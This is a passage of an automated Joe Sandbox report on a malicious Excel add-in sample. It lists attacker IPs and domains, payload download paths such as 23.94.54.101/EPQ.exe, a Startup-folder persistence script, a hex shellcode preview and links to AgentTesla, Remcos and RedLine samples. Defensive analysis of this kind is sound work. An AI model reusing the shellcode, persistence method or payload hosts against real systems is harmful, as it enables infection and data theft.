                                                    http://o.aolcdn.com/ads/adswrappermsni.jsbhvA8BE.tmp.20.drfalse
                                                      high
                                                      http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhvA8BE.tmp.20.drfalse
                                                        high
                                                        http://www.msn.com/?ocid=iehpbhvA8BE.tmp.20.drfalse
                                                          high
                                                          https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhvA8BE.tmp.20.drfalse
                                                            high
                                                            http://static.chartbeat.com/js/chartbeat.jsbhvA8BE.tmp.20.drfalse
                                                              high
                                                              http://www.msn.com/de-de/?ocid=iehpbhvA8BE.tmp.20.drfalse
                                                                high
                                                                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhvA8BE.tmp.20.drfalse
                                                                  high
                                                                  http://www.nirsoft.net/svchost.exe, 00000016.00000002.769616535.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                    high
                                                                    https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhvA8BE.tmp.20.drfalse
                                                                      high
                                                                      http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhvA8BE.tmp.20.drfalse
                                                                        high
                                                                        http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhvA8BE.tmp.20.drfalse
                                                                          high
                                                                          https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhvA8BE.tmp.20.drfalse
                                                                            high
                                                                            http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhvA8BE.tmp.20.drfalse
                                                                              high
                                                                              http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhvA8BE.tmp.20.drfalse
                                                                                high
                                                                                https://www.ccleaner.com/go/app_cc_pro_trialkeybhvA8BE.tmp.20.drfalse
                                                                                  high
                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icosvchost.exe, 00000014.00000002.778860586.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, chp8DDF.tmp.20.drfalse
                                                                                    high
                                                                                    https://contextual.media.net/8/nrrV73987.jsbhvA8BE.tmp.20.drfalse
                                                                                      high
                                                                                      http://www.imvu.comsvchost.exe, 00000011.00000002.783747275.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000016.00000002.769616535.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=chp8DDF.tmp.20.drfalse
                                                                                          high
                                                                                          https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchsvchost.exe, 00000014.00000002.778860586.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, chp8DDF.tmp.20.drfalse
                                                                                            high
                                                                                            https://contextual.media.net/bhvA8BE.tmp.20.drfalse
                                                                                              high
                                                                                              https://www.ecosia.org/newtab/svchost.exe, 00000014.00000002.778860586.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, chp8DDF.tmp.20.drfalse
                                                                                                high
                                                                                                http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhvA8BE.tmp.20.drfalse
                                                                                                  high
                                                                                                  https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhvA8BE.tmp.20.drfalse
                                                                                                    high
                                                                                                    https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=svchost.exe, 00000014.00000002.778860586.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, chp8DDF.tmp.20.drfalse
                                                                                                      high
                                                                                                      http://www.msn.com/bhvA8BE.tmp.20.drfalse
                                                                                                        high
                                                                                                        https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhvA8BE.tmp.20.drfalse
                                                                                                        • 0%, Virustotal, Browse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://ac.ecosia.org/autocomplete?q=chp8DDF.tmp.20.drfalse
                                                                                                          high
                                                                                                          https://search.yahoo.com?fr=crmas_sfpsvchost.exe, 00000014.00000002.778860586.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, chp8DDF.tmp.20.drfalse
                                                                                                            high
                                                                                                            http://www.imvu.com/Tsvchost.exe, 00000016.00000002.769567756.000000000014C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhvA8BE.tmp.20.drfalse
                                                                                                                high
                                                                                                                http://cdn.at.atwola.com/_media/uac/msn.htmlbhvA8BE.tmp.20.drfalse
                                                                                                                  high
                                                                                                                  http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2FsetbhvA8BE.tmp.20.drfalse
                                                                                                                    high
                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=chp8DDF.tmp.20.drfalse
                                                                                                                      high
                                                                                                                      https://policies.yahoo.com/w3c/p3p.xmlbhvA8BE.tmp.20.drfalse
                                                                                                                        high
                                                                                                                        http://www.msn.com/advertisement.ad.jsbhvA8BE.tmp.20.drfalse
                                                                                                                          high
                                                                                                                          http://www.ebuddy.comsvchost.exe, 00000011.00000002.783747275.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000016.00000002.769616535.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs
                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          239.255.255.250
                                                                                                                          unknownReserved
                                                                                                                          unknownunknownfalse
                                                                                                                          23.94.54.101
                                                                                                                          unknownUnited States
                                                                                                                          36352AS-COLOCROSSINGUStrue
                                                                                                                          23.94.53.100
                                                                                                                          yuahdgbceja.sytes.netUnited States
                                                                                                                          36352AS-COLOCROSSINGUStrue
                                                                                                                          178.237.33.50
                                                                                                                          geoplugin.netNetherlands
                                                                                                                          8455ATOM86-ASATOM86NLtrue
                                                                                                                          172.217.1.4
                                                                                                                          www.google.comUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          IP
                                                                                                                          192.168.2.22
                                                                                                                          127.0.0.1
                                                                                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                          Analysis ID:1435094
                                                                                                                          Start date and time:2024-05-02 04:53:06 +02:00
                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                          Overall analysis duration:0h 10m 4s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                          Number of analysed new started processes analysed:19
                                                                                                                          Number of new started drivers analysed:4
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:0
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Sample name:202404294766578200.xlam.xlsx
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal100.phis.troj.spyw.expl.evad.winXLSX@35/20@6/7
                                                                                                                          EGA Information:
                                                                                                                          • Successful, ratio: 100%
                                                                                                                          HCA Information:
                                                                                                                          • Successful, ratio: 99%
                                                                                                                          • Number of executed functions: 98
                                                                                                                          • Number of non-executed functions: 257
                                                                                                                          Cookbook Comments:
                                                                                                                          • Found application associated with file extension: .xlsx
                                                                                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                          • Attach to Office via COM
                                                                                                                          • Active ActiveX Object
                                                                                                                          • Scroll down
                                                                                                                          • Close Viewer
                                                                                                                          • Override analysis time to 19162.1529447935 for current running targets taking high CPU consumption
                                                                                                                          • Override analysis time to 38324.3058895871 for current running targets taking high CPU consumption
                                                                                                                          • Override analysis time to 76648.6117791742 for current running targets taking high CPU consumption
                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, vga.dll, svchost.exe
                                                                                                                          • Excluded IPs from analysis (whitelisted): 142.251.33.163, 142.251.32.78, 172.253.63.84, 34.104.35.123, 142.251.41.35
                                                                                                                          • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, update.googleapis.com, clientservices.googleapis.com, clients.l.google.com
                                                                                                                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                          • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                          TimeTypeDescription
                                                                                                                          04:54:51API Interceptor227x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                          04:57:09API Interceptor57x Sleep call for process: svchost.exe modified
                                                                                                                          19:57:15AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bactris.vbs
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          239.255.255.2507sYKxZWLgw.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                            Account report (1).docxGet hashmaliciousUnknownBrowse
                                                                                                                              Account report (1).docxGet hashmaliciousUnknownBrowse
                                                                                                                                Account report (1).docxGet hashmaliciousUnknownBrowse
                                                                                                                                  Account report (1).docxGet hashmaliciousUnknownBrowse
                                                                                                                                    SecuriteInfo.com.Program.Unwanted.4826.21447.30958.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      https://ipgnz-my.sharepoint.com/:b:/p/dennis/EQBdT3T6DAtNud_AgeVvevoBe4Wv-zzpt7vOYoJkOhRHCQ?e=4%3ao8ZtZs&at=9&xsdata=MDV8MDJ8bGlhbmRhLnN0b2VsQG1sY2luc3VyYW5jZS5jb20uYXV8ZWQ1OTE1MzNhZDY4NDYyZGVhMzEwOGRjNjk4OGRiNjR8YTRlYmRjZDY2ODU0NGRlMGIxOGM3MmQ2ZjA5ZDA1MzV8MHwwfDYzODUwMTI4NDE4MTIzMzI1MXxVbmtub3dufFRXRnBiR1pzYjNkOGV5SldJam9pTUM0d0xqQXdNREFpTENKUUlqb2lWMmx1TXpJaUxDSkJUaUk2SWsxaGFXd2lMQ0pYVkNJNk1uMD18ODAwMDB8fHw%3d&sdata=Zjh2Q283ajAyWEprbjBOUFdSdEFmRDhIdUU4Ym01c0JKNzV6cU1BWklhST0%3dGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                        Signature requested-Fiona QR.pngGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          Arrival Notice.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                            Arrival Notice.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                              23.94.54.101attachment.xlam.xlsxGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                                                                              • 23.94.54.101/EPQ.exe
                                                                                                                                              NI-45733-D.xlam.xlsxGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                                                                              • 23.94.54.101/ESS.exe
                                                                                                                                              178.237.33.50PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                              nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                              Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                              Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                              bYPQHxUNMF.exeGet hashmaliciousRemcosBrowse
                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                              doc.batGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                              New Order.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                              PO-TKT-RFQ#24_4_30.com.exeGet hashmaliciousRemcosBrowse
                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                              AWBSHIPPING-DHL-46T6R9764987.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                              1714456209369804801bdf0184bf91899d6952ac3158287761ba79e58bda9aa9358475c597235.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                              • geoplugin.net/json.gp
                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              geoplugin.netPLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              bYPQHxUNMF.exeGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              doc.batGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              New Order.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              PO-TKT-RFQ#24_4_30.com.exeGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              AWBSHIPPING-DHL-46T6R9764987.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              1714456209369804801bdf0184bf91899d6952ac3158287761ba79e58bda9aa9358475c597235.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              AS-COLOCROSSINGUSOWrVfOdM62.rtfGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                              • 192.3.239.4
                                                                                                                                              ET2431000075 & ET2431000076.xlsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                              • 192.3.239.4
                                                                                                                                              nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                              • 107.172.31.6
                                                                                                                                              SecuriteInfo.com.Linux.Siggen.9999.4824.4127.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                              • 23.94.151.97
                                                                                                                                              QF3YL9rOxB.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                                                                              • 192.3.243.154
                                                                                                                                              attachment.xlam.xlsxGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                                                                              • 23.94.54.101
                                                                                                                                              citat-05012024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                              • 192.3.243.154
                                                                                                                                              cotizaci#U00f3n_04302024.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                              • 192.3.243.154
                                                                                                                                              SecuriteInfo.com.Exploit.ShellCode.69.24915.2103.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                                                                              • 192.3.243.154
                                                                                                                                              SecuriteInfo.com.Exploit.ShellCode.69.11288.31380.rtfGet hashmaliciousUnknownBrowse
                                                                                                                                              • 107.175.242.96
                                                                                                                                              AS-COLOCROSSINGUSOWrVfOdM62.rtfGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                              • 192.3.239.4
                                                                                                                                              ET2431000075 & ET2431000076.xlsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                              • 192.3.239.4
                                                                                                                                              nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                              • 107.172.31.6
                                                                                                                                              SecuriteInfo.com.Linux.Siggen.9999.4824.4127.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                              • 23.94.151.97
                                                                                                                                              QF3YL9rOxB.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                                                                              • 192.3.243.154
                                                                                                                                              attachment.xlam.xlsxGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                                                                              • 23.94.54.101
                                                                                                                                              citat-05012024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                              • 192.3.243.154
                                                                                                                                              cotizaci#U00f3n_04302024.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                              • 192.3.243.154
                                                                                                                                              SecuriteInfo.com.Exploit.ShellCode.69.24915.2103.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                                                                              • 192.3.243.154
                                                                                                                                              SecuriteInfo.com.Exploit.ShellCode.69.11288.31380.rtfGet hashmaliciousUnknownBrowse
                                                                                                                                              • 107.175.242.96
                                                                                                                                              ATOM86-ASATOM86NLPLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:c2e8c3b1-63be-4a97-a3b9-a21649a6fcffGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              bYPQHxUNMF.exeGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              doc.batGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              New Order.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              PO-TKT-RFQ#24_4_30.com.exeGet hashmaliciousRemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              AWBSHIPPING-DHL-46T6R9764987.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                              • 178.237.33.50
                                                                                                                                              No context
                                                                                                                                              No context
                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):965
                                                                                                                                              Entropy (8bit):5.02359004946268
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:tkhXkmnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qhXldVauKyGX85jvXhNlT3/7AcV9Wro
                                                                                                                                              MD5:A82488501536043ACF922C4D91246D09
                                                                                                                                              SHA1:BCA9EF44B47567D62A94F2ED6A79491575544D06
                                                                                                                                              SHA-256:47F1D58A3F31240D1EAE84F8585B4AFFA9ECE1EDF5FFB39631431954E1B39D5E
                                                                                                                                              SHA-512:30F80522E14B7AC59FB4D260D8C36A3FB88CCF29B7E279F34A493F94B59CF1EC0951205E33A1E81631AD8C682CF8831BC185E224A43A87BB52CB0C0D7080DB50
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{. "geoplugin_request":"191.96.150.225",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                              Process:C:\Users\user\AppData\Roaming\YED.exe
                                                                                                                                              File Type:ASCII text, with very long lines (29744), with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):29744
                                                                                                                                              Entropy (8bit):3.5495038822751415
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:wiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbRE+IBg84vfF3if6gy9S:wiTZ+2QoioGRk6ZklputwjpjBkCiw2RM
                                                                                                                                              MD5:5846F7B7E4DA4C2A6F65EDBD30207C9D
                                                                                                                                              SHA1:8A3B8A8FCD130DE14FB8926C895D544B19A67AD3
                                                                                                                                              SHA-256:38C9E99D2366B4AE38F5CE39B443FA92D046077296035BAA5941C99C733632FD
                                                                                                                                              SHA-512:524C4A37B011F479B287597726740ACD58FCF8517EBF497EB62B5A0B09F7FA8910FB71AF379646B815AE493D2B908A840B1D9CE0DBDC0717BE2010471EED937F
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:048B4C24088B008B093BC8760483C8FFC31BC0F7D8C38B0x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c0000006689957cffffffb86c00000066
                                                                                                                                              Process:C:\Users\user\AppData\Roaming\YED.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):407084
                                                                                                                                              Entropy (8bit):7.892991458916071
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12288:5Y7/epA+GWjJxDpsHIkSBBWR6tna1bEX+9j9BR2EMh2:5qRhPR6OEX8j9/2EA2
                                                                                                                                              MD5:5816FD286AFCB30B981CA55E867A40BF
                                                                                                                                              SHA1:BA87750C26842B802EDEFEB86802D42DBF6C21E6
                                                                                                                                              SHA-256:1DA09B783C94CA10A320CC6B9ADBD0E879982105ACEB6AFAD1F03245C7B7B809
                                                                                                                                              SHA-512:8CEF41F0FEFB22C3DA77C998074ED28044848B8A70C311B50A222EFFA493FF71F8B860263554372F9EADD48727F97FD0EFF8152348E11EB1304837C9B534820B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:EA06.....C..zm..0.P..].oT..i.zp.....(...R..!.....U...ZW.sN..?.?..3....)5..<.J.S9u.m$.Vgs....n..+.)T.......i..`.P'W`.....H..w..F.99\7E.m.v.LT.@.Il..P..h......./+.....}v....6.|.... k.9.D..B.....+......,..a..J....".. k|....i..R ....U%..8 ...n!O......&..xk]A..k4*EV.*.U)t:h....Qj.Z@.......J...V..JuV..AU.tp..]h.zu....z..K.......V.@...^...wI.....N.U..`>m."o.......V..A.g...X.@....P..t.u].p.C.M.r...>.R.(11..h......7.Yd..AM.y'@.. .@..x.z@......n..<.C$..!.....J.T.....b....P.K,.GD..k`...aT......,.C.._$...W7.^......G. f....R.'.Qe......@r......E..P|....U;..0....B.@_...@.........?.....p.jf3...]].Gf....7.........P.:<..N.......-..^.t..ON..e..5.{u..*.,...^.u(.........r.@E......&.....R...tZ.~.4.S..k.:a......y.....h4..R..,tj./..@$.D..@..H8{...'.z.p...ar.R.{d..M.y..Z.s7..AbT....L.N....a..R*.o.....G.0.......`<.0.. ..`.i...I..f..........2.U.....^.+...b.9......P........`..........M......6P......P........h....F.(..>.0.`@(.M....f......*.V;...Z.n..k....................@..(9k
                                                                                                                                              Process:C:\Users\user\AppData\Roaming\YED.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):9940
                                                                                                                                              Entropy (8bit):7.604277577483741
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:m+cKjLMiz/tlNOVZOZIbgiQ+VjN7yObFOhgxe4rTKwvuEQxB2XQeyfSxKiw:97jwiz/tlUVZOggizjNMaJiwvcaWfIKj
                                                                                                                                              MD5:33EF5FF3683E9521D0D673AE23B45E97
                                                                                                                                              SHA1:DA97189F0AF2DAA97C777863CDA46B19EFE53A63
                                                                                                                                              SHA-256:7FE77D32141C1F66DE426ACAF52B096FA8991CB6DBEFF2A0F461F446A8632733
                                                                                                                                              SHA-512:73C49017A7D7D7B3CEEC6E03E0DC07AA4F0D2D5A2A4C9D22290B383AE8D62D21F82A0D2B7271C013078F939D29ABFF3BFFC5FC8A2D6C46FDA72F91287A881C83
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...
                                                                                                                                              Process:C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):407084
                                                                                                                                              Entropy (8bit):7.892991458916071
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12288:5Y7/epA+GWjJxDpsHIkSBBWR6tna1bEX+9j9BR2EMh2:5qRhPR6OEX8j9/2EA2
                                                                                                                                              MD5:5816FD286AFCB30B981CA55E867A40BF
                                                                                                                                              SHA1:BA87750C26842B802EDEFEB86802D42DBF6C21E6
                                                                                                                                              SHA-256:1DA09B783C94CA10A320CC6B9ADBD0E879982105ACEB6AFAD1F03245C7B7B809
                                                                                                                                              SHA-512:8CEF41F0FEFB22C3DA77C998074ED28044848B8A70C311B50A222EFFA493FF71F8B860263554372F9EADD48727F97FD0EFF8152348E11EB1304837C9B534820B
                                                                                                                                              Malicious:false
